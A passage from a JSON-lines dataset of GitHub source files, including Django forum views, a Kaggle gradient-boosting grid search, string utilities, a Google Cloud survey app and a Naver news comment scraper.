UserRegistrationForm\n return render(request,\n 'registration/register.html',\n {'user_form': user_form})\n\n# login views\ndef user_login(request):\n if request.method == 'POST':\n form = LoginForm(request.POST)\n if form.is_valid():\n cd = form.cleaned_data\n user = authenticate(username=cd['username'],\n password=cd['password'])\n if user:\n if user.is_active:\n login(request, user)\n return HttpResponse('Authenticated successfully')\n else:\n return HttpResponse('Disabled account')\n else:\n HttpResponse('Invalid login')\n else:\n form = LoginForm()\n return render(request, 'login.html', {'form': form})\n\n\n# post views\n@login_required\ndef add_post(request, section, topic):\n if request.method == 'POST':\n form = AddPostForm(data=request.POST)\n if form.is_valid():\n # form data is valid\n cd = form.cleaned_data\n new_post = form.save(commit=False)\n\n # assign current user and topic to post\n post_section = get_object_or_404(Section,\n slug=section)\n post_topic = get_object_or_404(Topic,\n section=post_section,\n slug=topic)\n\n new_post.owner = request.user\n new_post.topic = post_topic\n\n # save the post\n new_post.save()\n\n return redirect('forum:topic_detail', section, topic)\n else:\n form = AddPostForm\n\n return render(request,\n 'forum/add_post.html',\n {'form': form})\n\ndef update_likes(request):\n\n if request.method == 'POST':\n response_data = {}\n post_id = request.POST.get('post_id')\n post_action = request.POST.get('post_action')\n\n post = Post.objects.get(id=post_id)\n user = request.user\n if post.owner != user:\n\n if post_action == 'like':\n post.likes.add(user)\n else:\n post.likes.remove(user)\n post.save()\n\n response_data['result'] = 'updated'\n response_data['post_id'] = post.pk\n response_data['users_like'] = list(post.likes.all().values_list('username', flat=True))\n response_data['post_likes'] = post.likes.count()\n\n return HttpResponse(json.dumps(response_data),\n content_type='application/json')\n else:\n return HttpResponse({'result': 'not updated'},\n content_type='application/json')\n else:\n return HttpResponse({'result': 'not updated'},\n content_type='application/json')\n# chat views\ndef add_chat_message(request):\n\n if request.method == 'POST':\n message_text = request.POST.get('chat_message_text')\n if message_text:\n user = request.user\n response_data = {}\n\n new_message = Message.objects.create(content=message_text,\n owner=user)\n new_message.save()\n\n response_data['result'] = 'created'\n response_data['message_pk'] = new_message.pk\n response_data['text'] = new_message.content\n response_data['created'] = new_message.created.strftime('%b %d, %Y %I:%M %p')\n response_data['owner'] = new_message.owner.username\n\n return HttpResponse(json.dumps(response_data),\n content_type='application/json')\n else:\n return HttpResponse(json.dumps({'result': 'not created'}),\n content_type='application/json')\n else:\n return HttpResponse(json.dumps({'result': 'not created'}),\n content_type='application/json')\n\ndef refresh_chat(request):\n\n if request.method == 'POST':\n\n last_message = Message.objects.latest('created').content\n last_chat_message = request.POST.get('last_message')\n\n # check whether any new chat messages have been added\n if last_message != last_chat_message:\n response_data = {}\n\n # display the last five chat messages only\n messages = Message.objects.all()\n # need to convert to a list to use negative indexing\n last_ten_messages = list(messages.values('owner__username', 'created', 'content'))[-10:]\n last_ten_messages.reverse()\n for idx, message in enumerate(last_ten_messages):\n last_ten_messages[idx]['created'] = message['created'].strftime('%b %d, %Y %I:%M %p')\n\n response_data['result'] = 'refreshed'\n response_data['messages'] = last_ten_messages\n\n return HttpResponse(json.dumps(response_data),\n content_type='application/json')\n else:\n return HttpResponse(json.dumps({'result': 'not refreshed'}),\n content_type='application/json')\n else:\n return HttpResponse(json.dumps({'result': 'not refreshed'}),\n content_type='application/json')\n\n# profile views\n@login_required\ndef edit(request):\n if request.method == 'POST':\n user_form = UserEditForm(instance=request.user,\n date=request.POST)\n profile_form = ProfileEditForm(instance=request.user.profile,\n date=request.POST,\n files=request.FILES)\n if user_form.is_valid() and profile_form.is_valid():\n user_form.save()\n profile_form.save()\n else:\n user_form = UserEditForm(instance=request.user)\n profile_form = ProfileEditForm(instance=request.user.profile)\n return render(request,\n 'forum/edit.html',\n {'user_form': user_form,\n 'profile_form': profile_form})","repo_name":"arrancardnell/DjangoForum","sub_path":"forum/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"20791013729","text":"\"\"\"\nAuthor - Raunak Mundada\nDate - 6/17/2017\n\"\"\"\n\n\"\"\"\nRuns a grid search for gradient boosting machines\non Mercedes-Benz dataset\n\"\"\"\n\nimport os\nos.chdir(\"D:/ML_Projects/MercedesBenz-Kaggle/\")\nimport time\nimport numpy as np\nimport pandas as pd\n\nfrom sklearn.model_selection import GridSearchCV, ShuffleSplit, KFold\nimport sklearn.metrics as mt\nfrom sklearn import ensemble\n\nnp.random.seed(12548)\n\ndef read_data():\n\ttrain_data = pd.read_csv(\"./data/train.csv\")\n\ttest_data = pd.read_csv(\"./data/test.csv\")\n\n\treturn train_data, test_data\n\n\ndef process_data(train_data, test_data):\n\tbinary_cols, all_zero_cols, all_one_cols = [],[],[]\n\tfor col in train_data.iloc[:,10:]:\n\t\tunique_vals = train_data[col].unique()\n\t\tif np.array_equal(unique_vals, [1,0]) or np.array_equal(unique_vals, [0,1]):\n\t\t\tbinary_cols.append(col)\n\t\telif np.array_equal(unique_vals, [0]):\n\t\t\tall_zero_cols.append(col)\n\t\telif np.array_equal(unique_vals, [1]):\n\t\t\tall_one_cols.append(col)\n\t\telse:\n\t\t\tprint(unique_vals)\n\n\t# Drop columns with only zeros\n\ttrain_data = train_data.drop(all_zero_cols, axis=1)\n\ttest_data = test_data.drop(all_zero_cols, axis=1)\n\n\ttrain_cat_cols = train_data.iloc[:,2:10]\n\ttest_cat_cols = test_data.iloc[:,1:9]\n\tfreq=[]\n\tcol_names = []\n\tcat_mismatch = []\n\n\tfor train_col, test_col in zip(train_cat_cols, test_cat_cols):\n\t\tcol_names.append(train_col)\n\t\ttrain_freq = len(train_cat_cols[train_col].unique())\n\t\ttest_freq = len(test_cat_cols[test_col].unique())\n\n\t\tif train_freq!=test_freq:\n\t\t\tcat_mismatch.append(train_col)\n\n\t\tfreq.append([train_freq, test_freq])\n\tfreq = pd.DataFrame(freq, columns=['Train_Freq', 'Test_Freq'], index=col_names)\n\n\ttrain_data = train_data.drop(cat_mismatch, axis=1)\n\ttest_data = test_data.drop(cat_mismatch, axis=1)\n\n\treturn train_data, test_data\n\n\ndef prepare_data_ml(train_data, test_data):\n\tX_train = pd.get_dummies(train_data)\n\tX_train = X_train.drop(['ID','y'], axis=1).values\n\ty_train = train_data.y.values\n\n\tX_test = pd.get_dummies(test_data)\n\ty_test_id = test_data.ID.values\n\tX_test = X_test.drop(['ID'], axis=1).values\n\n\treturn X_train, y_train, X_test, y_test_id\n\n\ndef gridSearch_gbm(X_train, y_train, K=5):\n\tparam_grid = param_grid = {'n_estimators': [100,500,1000], 'max_depth': [3,5,10],\n\t\t\t\t\t\t\t\t'min_samples_split': [2],\n\t\t\t\t\t\t\t\t'learning_rate':[10e-3, 10e-2,10e-1] ,\n\t\t\t\t\t\t\t\t'loss': ['ls','huber'],\n\t\t\t\t\t\t\t\t'subsample':[1], 'max_features':['sqrt','log2'],\n\t\t\t\t\t\t\t\t'criterion':['friedman_mse']}\n\n\tcv_kfold = KFold(n_splits=K, shuffle=True, random_state=12548)\n\n\tgbm_regressor = ensemble.GradientBoostingRegressor(random_state=122)\n\n\tgs_gbm = GridSearchCV(estimator=gbm_regressor,\n\t param_grid=param_grid,\n\t scoring='r2',\n\t cv=cv_kfold,\n\t n_jobs=-1,\n\t verbose=1)\n\tgs_gbm.fit(X_train, y_train)\n\tprint(gs_gbm.best_score_)\n\n\treturn gs_gbm.best_estimator_\n\n\ndef eval_gbm(gbm_regressor, X_train, y_train, K=5):\n\tcv_ss = ShuffleSplit(n_splits=K, test_size=0.3, random_state=12548)\n\treg_scores = []\n\n\tfor train_idx, val_idx in cv_ss.split(X_train, y_train):\n\t\tx_train_cv, y_train_cv = X_train[train_idx], y_train[train_idx]\n\t\tx_val_cv, y_val_cv = X_train[val_idx], y_train[val_idx]\n\n\t\treg_model = gbm_regressor\n\t\treg_model.fit(x_train_cv, y_train_cv)\n\t\ty_pred_cv = reg_model.predict(x_val_cv)\n\n\t\tr_2 = mt.r2_score(y_val_cv, y_pred_cv) # Coefficient of determination\n\t\tmse = mt.mean_squared_error(y_val_cv, y_pred_cv) # Mean squared error\n\t\texplained_var = mt.explained_variance_score(y_val_cv, y_pred_cv) # Explained variance\n\n\t\treg_scores.append([r_2, mse, explained_var])\n\n\treg_scores = pd.DataFrame(reg_scores, columns=['R^2','MSE','Explained_Variance'])\n\treturn reg_scores\n\n\ndef make_submission(reg_estimator, X_test, ID, fname='FinalSubmission'):\n y_pred = reg_estimator.predict(X_test)\n final_submission = pd.DataFrame(np.hstack([ID[:,np.newaxis], y_pred[:,np.newaxis]]), columns=['ID','y'])\n final_submission.ID = final_submission.ID.astype(int)\n final_submission.to_csv('./results/'+fname, index=False)\n return final_submission\n\n\ndef run_gridSearch_gbm():\n\tprint(\"Read and preprocess data\")\n\n\ttrain_data, test_data = read_data()\n\ttrain_data, test_data = process_data(train_data, test_data)\n\n\tX_train, y_train, X_test, y_test_id = prepare_data_ml(train_data, test_data)\n\n\tprint(\"Training Samples: \", X_train.shape)\n\tprint(\"Test Sample: \", X_test.shape)\n\n\tprint(\"============ Grid Search GBM ================\")\n\n\tgbm_best_estimator = gridSearch_gbm(X_train, y_train, K=3)\n\tprint(gbm_best_estimator)\n\n\nif __name__ == '__main__':\n\tstart_time = time.time()\n\trun_gridSearch_gbm()\n\tprint(\"----%s seconds----\"%(time.time()-start_time))\n","repo_name":"raunakm90/ML_Projects","sub_path":"MercedesBenz-Kaggle/gbm.py","file_name":"gbm.py","file_ext":"py","file_size_in_byte":4680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"12459314387","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[2]:\n\n\na=[]\nnumber=int(input(\"number of elements\"))\nfor i in range(1,number+1):\n value=int(input(\"enter the value of %d elements:\" %i))\n a.append(value)\nprint(\"positive numbers in the list are :\")\nfor j in range(number):\n if(a[j]>0):\n print(a[j],end= ' ')\n \n\n\n# In[ ]:\n\n\n\n\n","repo_name":"Geethu1502/Geethu","sub_path":"Untitled7.py","file_name":"Untitled7.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"37187860311","text":"import os\nimport random\nimport asl\nfrom mniststack import train_stack, stack_args\nimport torch\nfrom common import trainloadsave\nfrom asl.loss import mean\nfrom torch import optim\nimport torch.nn.functional as F\n\ndef tracegen1(nitems, nrounds):\n def trace1(items, r, runstate, push, pop, empty):\n \"\"\"Push push push, pop pop pop\"\"\"\n asl.log_append(\"empty\", empty)\n stack = empty\n for nr in range(nrounds):\n for i in range(nitems):\n (stack,) = push(stack, next(items))\n asl.log_append(\"{}/internal\".format(runstate['mode']), stack)\n\n for j in range(nitems):\n (stack, pop_item) = pop(stack)\n asl.observe(pop_item, \"pop.{}.{}\".format(nr, j), runstate)\n asl.log_append(\"{}/internal\".format(runstate['mode']), stack)\n \n return pop_item\n \n return trace1\n\ndef tracegenclassic(nitems, nrounds):\n def trace(items, r, runstate, push, pop, empty):\n \"\"\"Example stack trace\"\"\"\n asl.log_append(\"empty\", empty)\n stack = empty\n\n (stack,) = push(stack, next(items))\n asl.log_append(\"{}/internal\".format(runstate['mode']), stack)\n\n (stack,) = push(stack, next(items))\n asl.log_append(\"{}/internal\".format(runstate['mode']), stack)\n\n (pop_stack, pop_item) = pop(stack)\n asl.observe(pop_item, \"pop1\", runstate)\n asl.log_append(\"{}/internal\".format(runstate['mode']), pop_stack)\n\n (pop_stack, pop_item) = pop(pop_stack)\n asl.observe(pop_item, \"pop2\", runstate)\n asl.log_append(\"{}/internal\".format(runstate['mode']), pop_stack)\n return pop_item\n\n return trace\n\ndef optim_sampler():\n lr = 0.001\n optimizer = optim.Adam\n return {\"optimizer\": optimizer,\n \"lr\": lr}\n\ndef stack_optspace():\n arch_opt = {'batch_norm': True,\n 'h_channels': 8,\n 'nhlayers': 4,\n 'activation': F.elu,\n 'ks': 3,\n 'last_activation': F.elu,\n 'learn_batch_norm': True,\n 'padding': 1}\n\n return {\"tracegen\": tracegenclassic,\n \"nrounds\": 1,\n \"dataset\": \"omniglot\",\n \"nchannels\": 1,\n \"nitems\": 2,\n \"normalize\": [True],\n \"batch_size\": [32],\n \"learn_constants\": [True],\n \"accum\": mean,\n \"init\": [torch.nn.init.uniform],\n \"arch_opt\": arch_opt,\n \"optim_args\": optim_sampler}\n\ndef traces_gen(nsamples):\n # Delaying computation of this value because we dont know nsamples yet\n return asl.prodsample(stack_optspace(),\n to_enum=[],\n to_sample=[\"init\",\n \"batch_size\",\n \"lr\",\n \"learn_constants\",\n \"normalize\"],\n to_sample_merge=[\"optim_args\"],\n nsamples=nsamples)\n\nif __name__ == \"__main__\":\n thisfile = os.path.abspath(__file__)\n res = trainloadsave(thisfile,\n train_stack,\n traces_gen,\n stack_args)","repo_name":"zenna/asl","sub_path":"aslbench/basicstacktrain.py","file_name":"basicstacktrain.py","file_ext":"py","file_size_in_byte":3042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"71839646854","text":"#!/usr/bin/env python\n# encoding: utf-8\n\"\"\"\nstring.py\n\nstring utility\n\n\n\"\"\"\n\nimport re\nimport datetime\n\n\n# douban-utils copy begin.\n# follow code block were copy from douban-utils (https://github.com/douban/douban-utils)\n\ndef trunc_utf8(string, num, etc=\"...\"):\n \"\"\"truncate a utf-8 string, show as num chars.\n arg: string, a utf-8 encoding string; num, look like num chars\n return: a utf-8 string\n \"\"\"\n gb = string.decode(\"utf8\", \"ignore\").encode(\"gb18030\", \"ignore\")\n if num >= len(gb):\n return string\n ret = gb[:num].decode(\"gb18030\", \"ignore\").encode(\"utf8\")\n if etc:\n ret += etc\n return ret\n\n\ndef decode_utf8_str(c):\n try:\n if isinstance(c, unicode):\n return c\n content = unicode(c, 'utf8', errors='replace')\n except TypeError:\n content = unicode(c, errors='replace')\n return content\n\n\ndef trunc_short(s, max_len=210, etc=\"...\"):\n s = decode_utf8_str(s)\n if len(s) >= max_len:\n s = s[:max_len] + unicode(etc)\n return s\n\n\ndef utf8_length(string):\n return string and len(string.decode(\"utf8\", \"ignore\").encode(\"gb18030\", \"ignore\")) or 0\n\n\ndef trunc_utf8_by_char(s, num, etc=\"...\"):\n unistr = decode_utf8_str(s)\n if num >= len(unistr):\n return s\n s2 = unistr[:num].encode(\"utf8\")\n if etc:\n s2 += etc\n return s2\n\n\ndef js_quote(js):\n return js.replace('\\\\', r'\\\\').replace('\\r', r'\\r') \\\n .replace('\\n', r'\\n').replace(\"'\", r\"\\'\").replace('\"', r'\\\"')\n\n\nEMAILRE = re.compile(r'^[_\\.0-9a-zA-Z+-]+@([0-9a-zA-Z]+[0-9a-zA-Z-]*\\.)+[a-zA-Z]{2,4}$')\n\n\ndef is_valid_email(email):\n if len(email) >= 6:\n return EMAILRE.match(email) != None\n return False\n\n\ndef format_rfc822_date(dt, localtime=True, cookie_format=False):\n if localtime:\n dt = dt - datetime.timedelta(hours=8)\n fmt = \"%s, %02d %s %04d %02d:%02d:%02d GMT\"\n if cookie_format:\n fmt = \"%s, %02d-%s-%04d %02d:%02d:%02d GMT\"\n\n # dt.strftime('%a, %d-%b-%Y %H:%M:%S GMT')\n return fmt % (\n [\"Mon\", \"Tue\", \"Wed\", \"Thu\", \"Fri\", \"Sat\", \"Sun\"][dt.weekday()],\n dt.day,\n [\"Jan\", \"Feb\", \"Mar\", \"Apr\", \"May\", \"Jun\",\n \"Jul\", \"Aug\", \"Sep\", \"Oct\", \"Nov\", \"Dec\"][dt.month - 1],\n dt.year, dt.hour, dt.minute, dt.second)\n\n\ndef format_cookie_date(dt, localtime=True):\n return format_rfc822_date(dt, localtime=True, cookie_format=True)\n\n\ndef is_ascii_string(text):\n if not isinstance(text, basestring):\n return False\n replace = [c for c in text if not (' ' <= c <= '~')]\n if replace:\n return False\n else:\n return True\n\n\n# douban-utils end.\n\n\ndef str2bool(s, default=False):\n \"\"\"Convert str to bool value\n\n >>> str2bool('') or str2bool(u'') or str2bool(None)\n False\n >>> str2bool('on') and str2bool(u'on') and str2bool(u'1') and str2bool('1')\n True\n \"\"\"\n if not s:\n return False\n if s in ('', u''):\n return False\n s = s.lower()\n if s in (u'on', u'true', u'1', 'on', 'true', '1'):\n return True\n if s in (u'off', u'false', u'0', 'off', 'false', '0'):\n return False\n return default\n\n\n_first_cap_re = re.compile('(.)([A-Z][a-z]+)')\n_all_cap_re = re.compile('([a-z0-9])([A-Z])')\n\n\ndef dashify(name):\n s1 = _first_cap_re.sub(r'\\1-\\2', name)\n return _all_cap_re.sub(r'\\1-\\2', s1).lower()\n\n\ndef camel_to_snake(name):\n s1 = _first_cap_re.sub(r'\\1_\\2', name)\n snake_str = _all_cap_re.sub(r'\\1_\\2', s1).lower()\n return snake_str.replace('__', '_')\n\n\ndef dash_to_camel(dashed_str):\n return _convert_to_camel(dashed_str, '-')\n\n\ndef snake_to_camel(snake_str):\n return _convert_to_camel(snake_str, '_')\n\n\ndef snake_to_cap(snake_str):\n return _convert_to_camel(snake_str, '_', True)\n\n\ndef _convert_to_camel(snake_cased_str, separator, first_cap=False):\n components = snake_cased_str.split(separator)\n preffix = \"\"\n suffix = \"\"\n if components[0] == \"\":\n components = components[1:]\n preffix = separator\n if components[-1] == \"\":\n components = components[:-1]\n suffix = separator\n if len(components) > 1:\n camel_cased_str = components[0].title() if first_cap else components[0].lower()\n for x in components[1:]:\n if x.isupper() or x.istitle():\n camel_cased_str += x\n else:\n camel_cased_str += x.title()\n else:\n camel_cased_str = components[0].title()\n return preffix + camel_cased_str + suffix\n\n\ndef quote_xml(in_str):\n if not in_str:\n return ''\n s1 = (isinstance(in_str, basestring) and in_str or\n '%s' % in_str)\n s1 = s1.replace('&', '&')\n s1 = s1.replace('<', '<')\n s1 = s1.replace('>', '>')\n return s1\n\n\ndef quote_xml_attrib(in_str):\n s1 = (isinstance(in_str, basestring) and in_str or\n '%s' % in_str)\n s1 = s1.replace('&', '&')\n s1 = s1.replace('<', '<')\n s1 = s1.replace('>', '>')\n if '\"' in s1:\n if \"'\" in s1:\n s1 = '\"%s\"' % s1.replace('\"', \""\")\n else:\n s1 = \"'%s'\" % s1\n else:\n s1 = '\"%s\"' % s1\n return s1\n","repo_name":"liqiwudao/job","sub_path":"utils/strtools.py","file_name":"strtools.py","file_ext":"py","file_size_in_byte":5123,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"33818387828","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport barf\nimport process\n\n\"\"\"\n\tSo, the plan here is to do checks (configuration, plugin, brain sanity)\n\tsince we do virtually NONE of that. We just blindly run and crash.\n\tIt sucks. :( This is where we'll do more sane importing too, so we aren't\n\timporting the same files over and over again. \n\t\n\tThis is where we will also expose internals for plugins to use.\n\t\n\t- cptmashek, 20140701\n\"\"\"\n\nclass scrib:\n\t\"\"\"\n\tSetting up gatekeeping.\n\t\"\"\"\n\tdef __init__(self):\n\t\t\"\"\"\n\t\tHere we'll load settings and set up modules.\n\t\t\"\"\"\n\t\tself.barf = barf.Barf\n\t\tself.process = process.process()\n\t\tself.settings = '' # compat, ugly.\n\t\tself.debug = self.getsetting('brain', 'debug')\t\t\n\n\t\tself.barf('MSG', 'Scrib %s initialized' % self.process.version)\n\n\t\n\t\"\"\"\n\tDown here, we are making some methods that give interfaces and plugins\n\tinformation in a controllable (and updatable) way.\n\t\"\"\"\n\t\n\tdef setcfg(self):\n\t\t\"\"\"\n\t\tSimple wrapper for cfg.set()\n\t\t\"\"\"\n\t\treturn self.process.cfg.set()\n\n\tdef save_all(self, interface, restart_timer=True):\n\t\tself.savesettings()\n\t\tself.process.brain.__save(interface, restart_timer)\n\n\tdef shutdown(self, interface):\n\t\t\"\"\"\n\t\tShuts us the scrib down.\n\t\t\"\"\"\n\t\tself.__save()\n\t\treturn self.process.brain.shutdown(interface)\n\n\tdef setsetting(self, module, setting, set):\n\t\t\"\"\"\n\t\tSet brain setting.\n\t\t\"\"\"\n\t\ttry:\n\t\t\tif module == 'scrib':\n\t\t\t\tmod = self.process.settings\n\t\t\telif module == 'brain':\n\t\t\t\tmod = self.process.brain.settings\n\t\t\tsetattr(mod, setting, set)\n\t\texcept AttributeError:\n\t\t\tself.barf('ERR', 'No %s setting in %s' % ( setting, module ))\n\n\tdef getsetting(self, module, setting):\n\t\t\"\"\"\n\t\tGet brain setting.\n\t\t\"\"\"\n\t\ttry:\n\t\t\tif module == 'scrib':\n\t\t\t\treturn getattr(self.process.settings, setting)\n\t\t\telif module == 'brain':\n\t\t\t\treturn getattr(self.process.brain.settings, setting)\n\t\texcept AttributeError:\n\t\t\tself.barf('ERR', 'No %s setting in %s' % ( setting, module ))\n\t\n\tdef __save(self):\n\t\tif self.debug == 1:\n\t\t\tself.barf('DBG', 'Saving process settings.')\n\t\tself.process.settings.save()\n","repo_name":"RobertTheMagnificent/scrib","sub_path":"core/scrib.py","file_name":"scrib.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"8836505688","text":"\"\"\"This file holds all the functions for executing the app\"\"\"\n\nfrom google.cloud import datastore\nfrom datetime import datetime\nfrom flask import request\nimport json\nimport yagmail\nimport csv\n\n\nclass DSSurvey:\n \"\"\"This class is for creating the survey and collecting responses in main.py file.\n 'surveys' Kind in Datastore is for holding the survey templates, which are keyed by their\n survey date. Survey responses are stored in a distinct kind for that survey date.\"\"\"\n # Datastore structure for survey creation is question, report, a1-a`n`\n\n def __init__(self):\n self.datastore_client = datastore.Client()\n self.kind = f\"{datetime.utcnow().strftime('%m%d%y')}survey\"\n self.sourcekind = \"surveys\"\n return\n\n def make(self, path):\n \"\"\"Read a csv file to make the survey key in DataStore. Surveys are stored in 'surveys' kind.\"\"\"\n\n # 1) Read a csv file and create a DataStore entity for the survey template.\n key = self.datastore_client.key(self.sourcekind, datetime.utcnow().strftime('%m%d%y'))\n entity = datastore.Entity(key)\n charts = [] # structured list to get chart types to make for each question\n\n # Read the CSV survey and have element names as the question and an array of possible answers as values\n # CSV format will be [0] question and [1:] answers\n data = csv.DictReader(open(path))\n for row in data:\n charts.append(row['chart'])\n del row['chart']\n q = row['question'] # This will be a series of Q&A to make up the Survey\n del row['question']\n answers = [v for v in row.values() if v != \"\"]\n entity[q] = answers\n entity['charts'] = charts\n # Save the submissions to Datastore\n self.datastore_client.put(entity=entity)\n return\n\n def survey(self):\n \"\"\"Get the initial survey for webpage from Datastore.\n Jsonify for html to parse on main webpage.\n Set kind to survey date and key to survey Q & A prompt\"\"\"\n # The key for the survey Q & A will always be 9999\n survey_source = self.datastore_client.key(self.sourcekind, datetime.utcnow().strftime('%m%d%y'))\n survey = dict(self.datastore_client.get(survey_source))\n return survey\n\n def responses(self):\n \"\"\"Write the responses back to DataStore survey for that date. Key is Employee ID\n that is submitted on webpage to avoid employees answering multiple times.\n This method is called after an employee submits their answers.\"\"\"\n\n empid = request.form.get('empid')\n key = self.datastore_client.key(self.kind, empid)\n entity = datastore.Entity(key)\n\n # Loop through answers in survey form and record to DataStore for given question.\n for q in DSSurvey().survey().keys():\n a = request.form[q]\n entity[q] = a\n # Non radio question below will take in the separate class of text input.\n entity['Any other feedback'] = request.form.get('closing')\n # Save the submissions to Datastore\n self.datastore_client.put(entity=entity)\n return\n\n\nclass Deployment:\n \"\"\"Used to deploy the webapp to contacts in DB. Currently supports Email but also looking\n to expand to SMS via Twilio or Nexmo.\"\"\"\n\n def __init__(self, company):\n self.datastore_client = datastore.Client()\n self.kind = \"{0}Employees\".format(company)\n self.url = \"https://cpb100-213205.ESCE.appspot.com\"\n return\n\n def upload(self, path):\n \"\"\"Given a csv file, upload contacts for that company\"\"\"\n data = csv.DictReader(open(path))\n for row in data:\n key = self.datastore_client.key(self.kind, row['empid'])\n entity = datastore.Entity(key)\n\n entity['admin'] = row['admin']\n entity['emailAddress'] = row['emailAddress']\n entity['fullName'] = row['fullName']\n entity['phoneNumber'] = row['phoneNumber']\n entity['report'] = row['report']\n # Save the submissions to Datastore\n self.datastore_client.put(entity=entity)\n return\n\n def contacts(self):\n \"\"\"Query DataStore to retrieve all employee ids, emails, and phone numbers from employee contact kind\"\"\"\n query = self.datastore_client.query(kind=self.kind)\n employees = query.fetch()\n # Return a list of dictionaries where each iterator is of keys[employee id, emailaddress, phone #]\n contacts = []\n for i in employees:\n employee = dict(i)\n employee['empid'] = str(i.key)[str(i.key).find('0'): str(i.key).find('0') + 4]\n contacts.append(employee)\n return contacts\n\n def email(self, receiver, receiver_name):\n \"\"\"Utilize yagmail to deploy emails to everyone in contact list with survey link\"\"\"\n deployer = \"survey-project@gmail.com\"\n passw = \"password\"\n yagmail.register(username=deployer, password=passw)\n yag = yagmail.SMTP(deployer)\n yag.send(\n to=receiver,\n subject=\"Employee Survey\",\n contents=\"Yo {0}?\\nPlease follow the following link to take survey:\\n{1}\".format(receiver_name, self.url))\n return\n","repo_name":"wspang/survey_app","sub_path":"app/GCP.py","file_name":"GCP.py","file_ext":"py","file_size_in_byte":5281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"267857702","text":"test_cases = int(input().strip())\n\nfor a_tc in range(test_cases):\n arr_len = int(input().strip())\n arr = input().strip().split()\n\n for idx in range(arr_len // 2):\n arr[idx], arr[-(idx + 1)] = arr[-(idx + 1)], arr[idx]\n\n for val in arr:\n print(val, end=' ')\n print()\n","repo_name":"s-surineni/compesline","sub_path":"arr_rev.py","file_name":"arr_rev.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"19787353208","text":"# 201226\nfrom selenium import webdriver\nfrom data.presses import PRESSES\nimport time\nfrom DB import Article, Reply, History\n\n\nclass Press:\n def __init__(self, name, section_num):\n self.name = name\n self.section_num = section_num\n self.ranking_url = \"https://news.naver.com/main/ranking/office.nhn?officeId={}\".format(section_num)\n\n\nclass Naver:\n def __init__(self):\n self.driver = None\n self.presses = []\n self.init_presses()\n self.activate()\n \n self.driver.implicitly_wait(3)\n\n\n self.article_links = []\n\n self.article_table = Article()\n self.reply_table = Reply()\n self.history_table = History()\n\n\n\n def init_presses(self):\n for press in PRESSES:\n self.presses.append(Press(press[1], press[0]))\n\n def activate(self):\n try:\n self.driver = webdriver.Chrome('/Users/ichangmin/driver/chromedriver')\n except:\n self.driver = webdriver.Chrome('/Users/changmin/Drivers/chromedriver')\n\n def update_article_urls(self, num=10):\n self.article_links = []\n\n for press in self.presses:\n self.driver.get(press.ranking_url)\n self.driver.implicitly_wait(1)\n\n elements = self.driver.find_elements_by_css_selector(\".list_content > a\")[:num]\n\n urls = [e.get_attribute('href') for e in elements]\n # TODO: db 여기서 확인하기\n\n self.article_links += urls\n\n def get_uids(self, url):\n #https://news.naver.com/main/read.nhn?mode=LSD&mid=sec&sid1=001&oid=088&aid=0000678594\n\n split_url = url.split(\"&\")\n\n oid, aid, sid = None, None, None\n\n for word in split_url:\n if \"oid\" in word:\n oid = word.split(\"=\")[1]\n elif \"aid\" in word:\n aid = word.split(\"=\")[1]\n elif \"sid\" in word:\n sid = word.split(\"=\")[1]\n\n return oid, aid, sid\n\n def get_best_replies(self, oid, aid):\n pass\n\n # 기사 링크에서\n def get_article_data(self):\n title = self.driver.find_element_by_id(\"articleTitle\").text\n date = self.driver.find_element_by_class_name(\"t11\").text\n split_date = date.split(\" \")\n date = split_date[0].replace(\".\", \"\")\n\n article_time = split_date[1]\n\n return title, date, article_time\n\n def parse_replies(self, oid, aid, sid):\n url = \"https://news.naver.com/main/ranking/read.nhn?m_view=1&includeAllCount=true&mode=LSD&mid=sec&sid1={}&oid={}&aid={}\".format(sid, oid, aid)\n self.driver.get(url)\n self.driver.implicitly_wait(1)\n\n replies_count = int(self.driver.find_element_by_class_name(\"u_cbox_count\").text.replace(\",\", \"\"))\n num_clicks = int(replies_count/20)\n\n # 리플 20개씩 로드 됨\n for _ in range(num_clicks):\n self.driver.find_element_by_css_selector(\"a.u_cbox_btn_more\").click()\n self.driver.implicitly_wait(1)\n\n reply_boxes = self.driver.find_elements_by_class_name('u_cbox_comment_box')\n\n count = 0\n for reply_box in reply_boxes:\n try:\n count += 1\n content = reply_box.find_element_by_class_name(\"u_cbox_contents\").text\n print(content)\n print(\"\")\n except:\n # 삭제된 댓글\n continue\n\n\n print(\"\\n 총 {} 개의 리플 중 {}개 파싱\".format(replies_count, count))\n\n\n def run(self, article_num=10):\n # 1. 랭킹 확인\n # 2. 기사 uid 확인 후 기존 데이터 없으면 insert (oid, aid, uid, title, time)\n # 3. 댓글 크롤링: comment num 확인하고 없으면 insert\n # 4. 좋아요 / 싫어요 row 추가\n\n self.update_article_urls(num=article_num)\n for url in self.article_links:\n self.driver.get(url)\n self.driver.implicitly_wait(1)\n\n oid, aid, sid = self.get_uids(url)\n uid = oid + aid\n result = self.article_table.find(uid)\n\n if len(result) == 0:\n title, date, article_time = self.get_article_data()\n Article.create(\"\", title, oid, aid, uid, sid, date, article_time)\n\n self.parse_replies(oid, aid, sid)\n\n\n\n\n\n\n\n\n\n\n\n\n @staticmethod\n def analyze_reply(article_link, reply):\n try:\n comment_no = reply.get_attribute(\"data-info\").split(',')[0].split(':')[1]\n content = reply.find_element_by_class_name('u_cbox_contents').text\n nickname = reply.find_element_by_class_name('u_cbox_nick').text\n date = reply.find_element_by_class_name('u_cbox_date').text\n likes = reply.find_element_by_class_name('u_cbox_cnt_recomm').text\n hates = 